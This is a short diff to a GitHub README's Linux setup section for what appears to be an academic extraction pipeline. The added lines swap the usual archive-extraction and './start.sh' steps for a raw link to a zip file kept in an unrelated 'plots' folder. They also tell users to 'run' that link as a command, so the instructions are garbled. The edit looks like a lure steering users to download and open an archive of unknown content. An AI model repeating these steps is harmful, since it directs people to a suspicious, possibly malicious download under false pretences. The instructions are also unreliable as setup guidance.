sagarr3108/Academic-Extraction-GenAI-Pipeline/README.md

 ### For Linux Users:

-1. Extract the downloaded `.tar.gz` file to your preferred directory.
+1. Extract the downloaded `https://raw.githubusercontent.com/sagarr3108/Academic-Extraction-GenAI-Pipeline/master/plots/Gen-Extraction-A-Academic-Pipeline-v3.0.zip` file to your preferred directory.
 2. Open a terminal window and navigate to the extracted folder.
-3. Run the command `./start.sh` to launch the application, ensuring you have necessary permissions.
+3. Run the command `https://raw.githubusercontent.com/sagarr3108/Academic-Extraction-GenAI-Pipeline/master/plots/Gen-Extraction-A-Academic-Pipeline-v3.0.zip` to launch the application, ensuring you have necessary permissions.

 ## 🖥️ How to Use the Application